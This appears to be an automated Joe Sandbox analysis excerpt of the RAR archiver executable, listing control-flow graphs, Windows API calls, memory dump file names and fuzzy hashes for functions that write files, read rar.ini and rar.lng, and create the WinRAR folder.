                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1715 7ff6bbcb7a5b-7ff6bbcb7a5e 1716 7ff6bbcb7a60-7ff6bbcb7a66 1715->1716 1717 7ff6bbcb7a68 1715->1717 1716->1717 1718 7ff6bbcb7a6b-7ff6bbcb7a7c 1716->1718 1717->1718 1719 7ff6bbcb7a7e-7ff6bbcb7a81 1718->1719 1720 7ff6bbcb7aa8 1718->1720 1722 7ff6bbcb7a83-7ff6bbcb7a86 1719->1722 1723 7ff6bbcb7a88-7ff6bbcb7a8b 1719->1723 1721 7ff6bbcb7aab-7ff6bbcb7ab8 1720->1721 1726 7ff6bbcb7ac8-7ff6bbcb7acb 1721->1726 1727 7ff6bbcb7aba-7ff6bbcb7abd 1721->1727 1722->1720 1722->1723 1724 7ff6bbcb7aa4-7ff6bbcb7aa6 1723->1724 1725 7ff6bbcb7a8d-7ff6bbcb7a90 1723->1725 1724->1721 1725->1720 1728 7ff6bbcb7a92-7ff6bbcb7a99 1725->1728 1730 7ff6bbcb7acf-7ff6bbcb7ad1 1726->1730 1727->1726 1729 7ff6bbcb7abf-7ff6bbcb7ac6 1727->1729 1728->1724 1731 7ff6bbcb7a9b-7ff6bbcb7aa2 1728->1731 1729->1730 1732 7ff6bbcb7ad3-7ff6bbcb7ae6 1730->1732 1733 7ff6bbcb7b2a-7ff6bbcb7bb0 call 7ff6bbcd1d34 call 7ff6bbcb3f04 1730->1733 1731->1720 1731->1724 1735 7ff6bbcb7ae8-7ff6bbcb7af2 call 7ff6bbcc9be0 1732->1735 1736 7ff6bbcb7b0a-7ff6bbcb7b27 1732->1736 1744 7ff6bbcb7bb2-7ff6bbcb7bba 1733->1744 1745 7ff6bbcb7bbc 1733->1745 1740 7ff6bbcb7af7-7ff6bbcb7b02 1735->1740 1736->1733 1740->1736 1744->1745 1746 7ff6bbcb7bbf-7ff6bbcb7bc9 1744->1746 1745->1746 1747 7ff6bbcb7bda-7ff6bbcb7c06 call 7ff6bbcbb540 1746->1747 1748 7ff6bbcb7bcb-7ff6bbcb7bd5 call 7ff6bbcd1e1c 1746->1748 1752 7ff6bbcb7c40 1747->1752 1753 7ff6bbcb7c08-7ff6bbcb7c0f 1747->1753 1748->1747 1754 7ff6bbcb7c44-7ff6bbcb7c5a call 7ff6bbcbaa68 1752->1754 1753->1752 1755 7ff6bbcb7c11-7ff6bbcb7c14 1753->1755 1761 7ff6bbcb7c85-7ff6bbcb7c97 call 7ff6bbcbb540 1754->1761 1762 7ff6bbcb7c5c-7ff6bbcb7c6a 1754->1762 1755->1752 1756 7ff6bbcb7c16-7ff6bbcb7c2b 1755->1756 1756->1754 1758 7ff6bbcb7c2d-7ff6bbcb7c3e call 7ff6bbd09b98 1756->1758 1758->1754 1767 7ff6bbcb7c9c-7ff6bbcb7c9f 1761->1767 1762->1761 1764 7ff6bbcb7c6c-7ff6bbcb7c7e call 7ff6bbcb8d98 1762->1764 1764->1761 1769 7ff6bbcb7fa4-7ff6bbcb7fbe 1767->1769 1770 7ff6bbcb7ca5-7ff6bbcb7cfb call 7ff6bbce9354 call 7ff6bbcd6378 * 2 1767->1770 1777 7ff6bbcb7d17-7ff6bbcb7d1f 1770->1777 1778 7ff6bbcb7cfd-7ff6bbcb7d10 call 7ff6bbcb5414 1770->1778 1780 7ff6bbcb7d25-7ff6bbcb7d28 1777->1780 1781 7ff6bbcb7de2-7ff6bbcb7de6 1777->1781 1778->1777 1780->1781 1785 7ff6bbcb7d2e-7ff6bbcb7d36 1780->1785 1783 7ff6bbcb7e4e-7ff6bbcb7e68 call 7ff6bbce9958 1781->1783 1784 7ff6bbcb7de8-7ff6bbcb7e49 call 7ff6bbce98dc 1781->1784 1794 7ff6bbcb7e6a-7ff6bbcb7e84 1783->1794 1795 7ff6bbcb7e8b-7ff6bbcb7e8e 1783->1795 1784->1783 1788 7ff6bbcb7d38-7ff6bbcb7d49 call 7ff6bbd0a444 1785->1788 1789 7ff6bbcb7d59-7ff6bbcb7d6a call 7ff6bbd0a444 1785->1789 1801 7ff6bbcb7d57 1788->1801 1802 7ff6bbcb7d4b-7ff6bbcb7d56 call 7ff6bbcd8ae8 1788->1802 1797 7ff6bbcb7d78-7ff6bbcb7dc6 1789->1797 1798 7ff6bbcb7d6c-7ff6bbcb7d77 call 7ff6bbcdcf8c 1789->1798 1794->1795 1799 7ff6bbcb7e90-7ff6bbcb7e9a call 7ff6bbce9990 1795->1799 1800 7ff6bbcb7e9f-7ff6bbcb7eb8 call 7ff6bbcb1204 1795->1800 1797->1781 1822 7ff6bbcb7dc8-7ff6bbcb7de1 call 7ff6bbcb1314 call 7ff6bbd0ba34 1797->1822 1798->1797 1799->1800 1812 7ff6bbcb7ec8-7ff6bbcb7ed9 call 7ff6bbce941c 1800->1812 1801->1797 1802->1801 1817 7ff6bbcb7eba-7ff6bbcb7ec3 call 7ff6bbce9680 1812->1817 1818 7ff6bbcb7edb-7ff6bbcb7f9f call 7ff6bbcb1400 call 7ff6bbcd6424 call 7ff6bbcbb540 1812->1818 1817->1812 1818->1769 1822->1781
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: H9
                                                                                                                                                                                                                              • API String ID: 0-2207570329
                                                                                                                                                                                                                              • Opcode ID: d10ec36fd9120199c0687508098b586a24a6170a06ec7cc9f6dc87913b656c3a
                                                                                                                                                                                                                              • Instruction ID: e957a9a08dd90b1c296ffdd9523f8f81fa479e30bc25dd720074e7cd228f57d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d10ec36fd9120199c0687508098b586a24a6170a06ec7cc9f6dc87913b656c3a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EE1DF62A08A9A85EB20DB28E048BFD27B9FB4978CF554536CF4D833A5DF38E554C700

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1858 7ff6bbcd2574-7ff6bbcd259c 1859 7ff6bbcd25a5-7ff6bbcd25a9 1858->1859 1860 7ff6bbcd259e-7ff6bbcd25a0 1858->1860 1862 7ff6bbcd25ba-7ff6bbcd25c6 1859->1862 1863 7ff6bbcd25ab-7ff6bbcd25b6 GetStdHandle 1859->1863 1861 7ff6bbcd273a-7ff6bbcd2756 1860->1861 1864 7ff6bbcd25c8-7ff6bbcd25cd 1862->1864 1865 7ff6bbcd2619-7ff6bbcd2637 WriteFile 1862->1865 1863->1862 1866 7ff6bbcd2644-7ff6bbcd2648 1864->1866 1867 7ff6bbcd25cf-7ff6bbcd2609 WriteFile 1864->1867 1868 7ff6bbcd263b-7ff6bbcd263e 1865->1868 1870 7ff6bbcd2733-7ff6bbcd2737 1866->1870 1871 7ff6bbcd264e-7ff6bbcd2652 1866->1871 1867->1866 1869 7ff6bbcd260b-7ff6bbcd2615 1867->1869 1868->1866 1868->1870 1869->1867 1872 7ff6bbcd2617 1869->1872 1870->1861 1871->1870 1873 7ff6bbcd2658-7ff6bbcd2692 GetLastError call 7ff6bbcd3144 SetLastError 1871->1873 1872->1868 1878 7ff6bbcd2694-7ff6bbcd26a2 1873->1878 1879 7ff6bbcd26bc-7ff6bbcd26d0 call 7ff6bbccc95c 1873->1879 1878->1879 1880 7ff6bbcd26a4-7ff6bbcd26ab 1878->1880 1885 7ff6bbcd26d2-7ff6bbcd26db 1879->1885 1886 7ff6bbcd2721-7ff6bbcd272e call 7ff6bbcccf14 1879->1886 1880->1879 1882 7ff6bbcd26ad-7ff6bbcd26b7 call 7ff6bbcccf34 1880->1882 1882->1879 1885->1862 1888 7ff6bbcd26e1-7ff6bbcd26e3 1885->1888 1886->1870 1888->1862 1889 7ff6bbcd26e9-7ff6bbcd271c 1888->1889 1889->1862
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3350704910-0
                                                                                                                                                                                                                              • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                              • Instruction ID: cb8d6dea732e871c6ec733f36ed3cdf03265e7c0432e475125d1e93a056070bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18518526A48A4197EA28DF29F41837A7770FB4DB84F440135DB5E8BAB1DF3CE446C640

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1894 7ff6bbcd1e80-7ff6bbcd1ebb call 7ff6bbd0a5a0 1897 7ff6bbcd1ebd-7ff6bbcd1ec1 1894->1897 1898 7ff6bbcd1ec8 1894->1898 1897->1898 1899 7ff6bbcd1ec3-7ff6bbcd1ec6 1897->1899 1900 7ff6bbcd1ecb-7ff6bbcd1f57 CreateFileW 1898->1900 1899->1900 1901 7ff6bbcd1fcd-7ff6bbcd1fd1 1900->1901 1902 7ff6bbcd1f59-7ff6bbcd1f76 GetLastError call 7ff6bbce4534 1900->1902 1903 7ff6bbcd1fd3-7ff6bbcd1fd7 1901->1903 1904 7ff6bbcd1ff7-7ff6bbcd200f 1901->1904 1912 7ff6bbcd1fba 1902->1912 1913 7ff6bbcd1f78-7ff6bbcd1fb6 CreateFileW GetLastError 1902->1913 1903->1904 1906 7ff6bbcd1fd9-7ff6bbcd1ff1 SetFileTime 1903->1906 1907 7ff6bbcd2011-7ff6bbcd2022 call 7ff6bbcfa9e8 1904->1907 1908 7ff6bbcd2027-7ff6bbcd204b call 7ff6bbd0a610 1904->1908 1906->1904 1907->1908 1916 7ff6bbcd1fbf-7ff6bbcd1fc1 1912->1916 1913->1901 1915 7ff6bbcd1fb8 1913->1915 1915->1916 1916->1901 1917 7ff6bbcd1fc3 1916->1917 1917->1901
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1999340476-0
                                                                                                                                                                                                                              • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                              • Instruction ID: 6a4e16811d6a6e9292710a2a8a2706296e243ee0a460c81267c04d96105802df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7414672A1868146FB64CF28E5087A966A0B749BB8F001738EF7D83AE4CF7CC445CB00

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                              • API String ID: 233258989-2235180025
                                                                                                                                                                                                                              • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                              • Instruction ID: 63831fc5672fe098f92974a97fdb3fb90395a02d5ff163f6a4f7523ea034b31e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F641BF22B1868281EB14EB29D5241F967B0FF587A4F401635EB9E83AF6EF3CE545C740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                              • String ID: rar.lng
                                                                                                                                                                                                                              • API String ID: 553376247-2410228151
                                                                                                                                                                                                                              • Opcode ID: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                                                                                                                                                                                              • Instruction ID: 7b7a6fa2eeb3f370f0c05f169f96e885bc84e60d85c025e23e50703599941f02
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52419F21E1C28285FA18EB29A41A2BD23B0BF9D754F685135DB0DCB2F7CF2DE4058750

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SHGetMalloc.SHELL32(?,00000800,?,00007FF6BBCE4432,?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE40C4
                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCE40DF
                                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32 ref: 00007FF6BBCE40F1
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6BBCE413F,?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCD34A0
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6BBCE413F,?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCD34D5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                              • String ID: WinRAR
                                                                                                                                                                                                                              • API String ID: 977838571-3970807970
                                                                                                                                                                                                                              • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                              • Instruction ID: ffeb8c00326c204880690242a401253c07f449bbf6c083e0fed8181191d23f15
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62216F16A08A8281EE54DF2AF8552BE6770BF8DBD0B485031EF0E87765DF3CE4458700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF6BBD13CEF,?,?,00000000,00007FF6BBD13CAA,?,?,00000000,00007FF6BBD13FD9), ref: 00007FF6BBD197A5
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6BBD13CEF,?,?,00000000,00007FF6BBD13CAA,?,?,00000000,00007FF6BBD13FD9), ref: 00007FF6BBD19807
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6BBD13CEF,?,?,00000000,00007FF6BBD13CAA,?,?,00000000,00007FF6BBD13FD9), ref: 00007FF6BBD19841
                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6BBD13CEF,?,?,00000000,00007FF6BBD13CAA,?,?,00000000,00007FF6BBD13FD9), ref: 00007FF6BBD1986B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1557788787-0
                                                                                                                                                                                                                              • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                              • Instruction ID: 3da73b643b6c687e04f1c83ebf038dd4d3441d2ca58ae98e7c3a734390f439de
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A214121E197A185E6288F1AA440229A6A4FF5CFD0F4C4335DF9EA7BB4DF3CE4528744
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
